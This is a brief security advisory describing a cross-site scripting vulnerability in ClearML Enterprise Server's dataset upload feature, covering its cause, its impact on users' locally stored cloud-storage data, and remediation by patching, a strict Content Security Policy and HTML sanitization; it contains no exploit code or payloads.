ClearML Enterprise Server Cross-Site Scripting Vulnerability in Dataset Upload Functionality

A cross-site scripting vulnerability has been identified in ClearML Enterprise Server versions 3.22.5-1533. This issue arises in the dataset upload feature, where a specially crafted HTTP request can inject arbitrary HTML. Attackers can exploit this vulnerability by sending a series of HTTP requests to upload malicious HTML files into a dataset. These files may then be rendered in the browser of an authenticated ClearML user, executing any JavaScript contained within the HTML. This vulnerability could lead to the exfiltration of sensitive data from the user's local storage, particularly information related to storage providers like AWS S3.

Impact

Exploitation of this vulnerability allows for cross-site scripting, where injected scripts are executed in the context of the user's browser. This could lead to the execution of malicious JavaScript, potentially allowing attackers to access and exfiltrate sensitive data from the user's local storage.

Remediation

Users are advised to update to the latest version of ClearML Enterprise Server, where this vulnerability has been patched. Additionally, consider implementing a strict Content Security Policy to limit script execution sources and sanitizing HTML content before upload.